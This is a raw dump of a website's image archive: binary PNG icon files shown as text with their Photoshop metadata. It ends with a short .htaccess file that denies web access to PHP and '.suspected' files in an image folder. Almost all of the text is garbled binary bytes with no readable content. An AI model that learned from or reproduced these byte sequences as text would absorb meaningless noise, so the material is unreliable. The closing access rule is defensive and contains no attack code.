��U��w�*;Ξp_��"g�g�`��~l��u��aѫ�8Q4t{�`�|��bT�,/�T���U~�C(hU�N�,�{2�z�
�O���J�hfX�:PR̞��H0洅v<����Nz��yܾ�J�
pw��M@�'ryq!�o�
������>�76�G��zo�֊�H�$��[�@�ɵ�K���]���{�Fu/V3�X�&[�2��wCt��x�L�Ťw7�dL~��]dE{�%|��n�x�-U���R��d���,�G�͕�F]��}�X���Ę[��;�A�8oޠ��O@��
�h��-ٖ�}|�I|�K�K�`�`��͔���dPf��l��ǀ�f��=�r�툀�Q?g"�S���s *v(A�1�
��rT{�����g���v�t��������f�m|2�q	�7;TH�Ѡ��ř~��֌�U��&���S�J�
��XZ�9��.\�%�hr�D�ޚ4�+u��:q�*��#�tx�>���ta�`����q4'�=1�^ ��)Y����MGx�C�[�՞BV�cp���Y���z�nE�Q
�F4E�+���l�*�]��GοІ�/���d^��|���_��gv,�`�}�	�$��¿8�����:	9�@��7R�2�
�[y:\c=�Ͻ�}��;N��CCP�@ŴZP�T0
�(�¶����]RޔR�t,V�^x��ۍ����]5�m�7���!��ڬ��r�oZJ�+��oK�d#qI�Ϸ�`�Nbt��IEND�B`�images/reset-icon.png000060400000002553152434416630010600 0ustar00�PNG


IHDRĴl;tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:65C150418DE411E58508B0998BAB5BBC" xmpMM:DocumentID="xmp.did:65C150428DE411E58508B0998BAB5BBC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:65C1503F8DE411E58508B0998BAB5BBC" stRef:documentID="xmp.did:65C150408DE411E58508B0998BAB5BBC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�:;�IDATxڬ��Ka��][����V��T�*�B�c�D� ^ċ�%Dx��D�R�%4�(*I1��hA��'�<
��3������3ߙy�v�*pD��u�#�
��s��;�j����g|�wclqҝ�:j��&΢
�ҁql˼׸�6ϖ��� U�jL�xf�\4��1��2!�D�PӈԮ�6.�7�!C��ddtp���݂2����]4Fx0ְ�_x�1,XᏯ�B}�l��独����gN�~��^f�x~_�e{͋aG�3Hh+����g�~�_�S\��s�=�Vg�#�H����Zq[��~tJA�7/!Y/u�7��'J|9�A	��&d`���x�}�Ӄ
�8}Å����������*�!C�R����xR&�EW��cx$5_���?0^����iD�Ji�=Y�^ik�/�r���ĺ��1�Wz[�ΰ}>�G��o���6��X^>��c:��W��!���5�IEND�B`�images/page_down.png000060400000007050152434416630010470 0ustar00�PNG


IHDR���	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-� cHRMz%������u0�`:�o�_�FSIDATx�b�{��������;&V!��bB��
�3�p������ۋ�ڹ��,�����<^APC�����,"���&���������������000��B�b��������B523s13q03s��@��X�32���V��������Y�B�^�f������b#v7000�sI����jgÑ�V��j���qI<�<��թ/�}~{��թ.t�qI0���P��9����.���~}T2n`db}x��������������=����Խ�
�,\p	���u5Q����WH�"Я��PV1mW4�P4��#5���~CU����ϯ�/�=�<��ݕ/�>�<�����l0[��cf�adbaddS
���#"TX9�fbf���+�����������ca��EϯoDd=9y��X��������s�h�����~{��[���!r�D�?�1�XXy!��䯓0��so[
E�*��M0qq2&N����8�:��>���Ѹ���R������{��D���N'9_N��;���LR1

���isC3��̂f�S�����m/�;v�cW�SeN�9�����]fn-��-�����

�cB "`k[���=�5�&  "r�д8�J�~�ͱJ$����C��D��}�r׀8�Sث�(�0�ɩU޳	P!���6�)=(|�rWH��`���EJ���TN�,��vN�g�ռ��6&�o_$�j���zsd�ϟ�g��c�g�	cȷ�(a�H�����wee:<���-���lKIEND�B`�images/radio-yes.png000060400000005574152434416630010432 0ustar00�PNG


IHDRKpl_	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-� cHRMz%������u0�`:�o�_�F�IDATxڌ�1JCQ���B����!k�2�U��w`�R���`�tk+!m��p�H��p��03Az�kd�~Z$�L2���=���	p�U�����
<º�/m,x,�%���Vx+�����t�|8�W����?�7&���5���scn�]�8��A�iS���IEND�B`�images/previous.png000060400000010757152434416630010411 0ustar00�PNG


IHDR7%��A@
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs.#.#x�?v^IDATx��Yyle��of��l�Z� ri �[��r��[�`,H{X��$��--
	
��� �p	��r���
iB��D��ݙ���N��ew��|}3��������70�91�;l8=~�j�3K���M57�ˁN-�;�$��W��o9�ԉ������20���c~Dڲ0@&̭i�l}�{��CX�@�-fbʆ������U���<O���P��U
(L/�����?�Nl/�:���7�L�
#זݛ)&{���u�`�zZ
dLP~h۹%Ͼ�}�X��9<%��\"I�� r�of�E�֒e?���r�qM�|��+�׈��h-�-�a��/؋p�oa��N`v�rf}3ި/��O�Fh�B98I��R��6�(0W���z��D����5nI�JB���A������m֬�����h
7����I3�S'�h��=q
:��5��։�R��A��*�ms�j�,DmBe�,�>
���� C���f
v?L�£�q3";�4{�:RV[ϱ#Û�>2s��+������ÒV>�'���0�Ġw����q�tGB�>	�����R��t��k\��
.��&0�$J
p�t�U�պ��Ϩdm'RѾyrL����b%*;Q�0No: �� @IR5.
��0�cܡ��t��p���d��#����88��b6� �1\Z1�f��:~�A<	�&����t��FT�L*U�ME�9�uČR�d��� f?�b���I=�����1��2Q(��mc�~l�S�U�"Q	��>��L��PH��0{���}igs�UE�%ʈI/�v�<b򟂪l��j�		��eG���8N_?��if��]�vr%������R2}NTC�L*�9#Q�'x'�C7�/�X�%-�ˌ�q��$3n*�����Mϵi���l�TG��;�`�.��ATt�b%������3-~0�ʈ�#9��^�`�i���L ^|�@r�
�50����A��=�L0.-�W) gQ��a�v�B��U����|�e����?f�Żͭ|o"+�7���}u�����]��]J����Y�������M*
�m� ��yM!~�T�?�(����u�׃XB�-eTjOC^#���B�F�|�WV�8����U����u
�iWڪv�ͨo���K2��6{Eׄ!�.�R�V>CPT.o/�MJ-?�4��P��<M@|>�dLu�YZ��,�,�=X�f2���������ȼ���M1�_�'S��T@E��Lv�B�m���oF�N{����q�H�Dj�C���NO��,�nF��RĤ�Y�S�B,��-87��:w"w(
���GR�uK�:N�d�gJvs�ާXt��&F9h~��qd�g��1�߮@F�ZHtMˋwn���9h�H|�J�U�4��M��a���>�\9��U�oO��E��
��6兑ĚNm�O�I�J�I���DQ�D�����W0��o�!!k[_�G�MTG��
�"�r��|�{���y���!��g�҇G2#�a�5k��F�{_�%]R*���}���e�f1ˍ��^��O�h|��WvSRˉ�&�7I� ��R�R�Q��uM�L�W�=sU<������{)h�$�w�?��'�`�6�X�o!o��;��o:����Ȏ��j�T��ӟ��&�1��q�ZD�岅�Ui8�9�Bx.�{���[�Eeg1������P�����
�`��\��y��������k�{��;��sb��{�,�ʕ�⺪Y�\(�����?`��������\w���}�$s�X��T��'���r�r�q���X�IEND�B`�images/filter_hide.png000060400000012140152434416630010777 0ustar00�PNG


IHDR@@�iq�
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs������/	�IDATx��[LU�?��"a�
H��PtZGg3���[Z���,g����nj�g�h�9���LLI�ǖ6m�j�6���ɦ�d`�VF����(��{��������}�z�ɻ���w�9���9����K4h�Ɠ�<!*�n����˺ҎH��G*��W��x+)Y|�g����ak$B# F�Qx�? <oVHD���ZZ=Z¯�46
@�O��=q
��$p���>��B�BMBϟ�2ufd��n�t
�EM1�N?
W^�����@Cg��k�82�`���@pC���5�(�G��pd���b���
{D���>4>j����a��O��x�!��$�I�xЌ'
� O�`��(ʲ��a��%�ƻ%���e���(���?n����9����Y9� J:��7�ML�!��(~��%br�f���'����?g��I����r��t�/Q~��;��g� 0Qz'�w`Y2CO0�Y���sŗ�	�<����A���G%+.���	�f���!�@����Sԡ�D��(�[���B�Y!1�rN��5�c\H[��`w��x���k�^�.��
�W���\hPM��ׁ`D�B���^*�Ӧ������r�aϞ72�C�R(�2���H�üV]8��{�IQ�k��/#�s^?��K�0lS����(@�����*�5♷C�g)�jo��-J�ƫ�)�_Qrmqq_���lo�4Y����A9�RW(:Z=v��32�`͟*r�oT��|4�v�]�q��K��r�7���&M�0�'?��8=�)��Io�(h�H��~��nxc�#��ﳯ�MHq9E\��*�:db{k���tٿ/Lz�Ѝ�[~2�*5<�����3�O�(��(�r,�ݻ�eo��lb�CI�ww&y�Nq�1��{�����aNj��~T��_#;`�:\��4�H`vS�ԕ���}�j�FQa�S�{�1���$�;��+��!E��09��sfj��:�z��~b�?2���@߾N{S��?���L'z���x�f�yYK���l�۽���u�Xu��ܽX�_�X����4�Ŏ`�p�Z@��]���1y�COO.~����{����륷�In�����<��2I-.�������w�DB��ﮖ�ܵ�w04���v�8��V��1�h=�qߏ�ӝx���g�m���WV��������E2e�'����▔�s�!��`dh��d��ߩ�I�=����w��ݻ�c���a�[-�u[}�\A�M�-pH�v%_+S]��@V���4=%�n�S�ߧ]ڱ]E�G�-��~�|��M��7tߊ���V������cS<����v����v�C��Ph�b������*�Zl2��B�^^&�0�I�����j}wWZ��L�	!�@VpIw?�!���M���)�V{��[����������6ߧԳ��D˾ځ�'w�2���!�@V`�Te<���8O�#!�l��8vy`�����|�s�6�>���֭^�ǖ~G>ٷ�W�_Bv��ޭ}$9Owߥ��%0{�&0���
QX����S\����ēn�ˎUQ>�x	�+ү���'g~�Y���s�ӓ��{�č?۳�15aR�S�X(�Z�3ӆ�ӡ�<�s�7/75��ô����l�]4���X
@�2hTb��+�rl��77�bD��Շ������q�StKQ~7�nw%�'lw����l�kDFJ�(y��;�D[y3��
>�����G��j��0��F%�w����.>���Z��Ә�vA�/�}X�q�W��ǻaa�|�f��|N��
�x=�ܠ�	MF�i�����d�y����g9����exUajj擙ߘ6&1)�n{G__������鹆�8G&����\��}�u��`)<��"�O��U-�3��|�'�����m{{ɧ�{R��I�g�O�XJ���(��"ܣ+uULc5}s���;�
�MW{0G�|0�C!V#��%p�bOu���!�i6�PΈ��<�}�GCAA�	j�\|y�*�G���TY��HhXbv4��|
9-��]N�&Ѥ!A���0x����v���[R+�kO���j(2aD���t5G�o�˩�f�?�ن�-=�#괪S�M�@�i{!ۨ���s�5��=-�/D���b�.�sxE�9��`����3=�r�$��am�ŗ^�"� ,D�-�����{���A�^ԏg�w����If��M[�L�3���؈�_T�@\�&����B�x����	��5������tE����VBw���`h� �_;e���(�������$"�V��O�G�z�j@�j���3�S�z[	���<�*� V�,7����s��@uv�U���ⳅe�)N������IEND�B`�images/05/nextbg.png000060400000002565152434416630010246 0ustar00�PNG


IHDRl ����tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:D3D854B938A411E3B0D78B1ADE8BF44D" xmpMM:DocumentID="xmp.did:D3D854BA38A411E3B0D78B1ADE8BF44D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D3D854B738A411E3B0D78B1ADE8BF44D" stRef:documentID="xmp.did:D3D854B838A411E3B0D78B1ADE8BF44D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>:B�;�IDATx��]KA�g���"M�.2$�
���#0�(
��2a�J=�$1+;�3�	��ݲ�e����@�qC*)`�� Ƀ�ዯH���u�Imҗm�p��1$um��W�<���k�ꈩS&�Ǧ�UIEɭ����xzaDꐦ&������x&�L+H
ĩ�>]w�ȴ�5HG��_"1mj�t�IǤ]��;=I���Ě��2��55v�I58sm;�����OT����D��F_��L�d_j�_[
�ƃ�	ҢW�b��&�ҙ�3��a\�.n��°��"n�?%$
V�ܸ'}$1,�����G[Ϸ��op.IJl�y#���>qM��9�.��M�b��畸�\���#ZR��T�U��7�a�wx*G+^Z�z��Bz��n��XL�+^����9�.�E7c-�R��l�Fު���Ͱ�a�5�����%z!�")׭K����$��I�X\Q�'�vA��O�a�3�r���HzK��L�A�Yz����IEND�B`�images/05/01.png000060400000002265152434416630007174 0ustar00�PNG


IHDR�6�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:54FAC91F37E211E39C42A8847DAA6BC9" xmpMM:DocumentID="xmp.did:54FAC92037E211E39C42A8847DAA6BC9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:54FAC91D37E211E39C42A8847DAA6BC9" stRef:documentID="xmp.did:54FAC91E37E211E39C42A8847DAA6BC9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���)IDATx��U���@�7�$�Hg�J�-l�/�g�%)A��� ��6�ϛ;�6!7��-r�]v�Μ���t]��+t I��y�|Bޮ�<�Z�}�㰡���ux3��y�I_��A b9��n��tH��,KQw��Ҷm��c]�7���i�\��qL�t�&��0�	iQ�i6M�T_��an�$Q��
A��ڬUU�i�|�"�(�q�e��a8���/�w�g�q�,�ey�݂��*˲��~�/�7�s�0��p�m۰"{o0J ��K��9��l�C�抢�04�Y
XIEND�B`�images/05/.htaccess000044400000000424152434416630010041 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
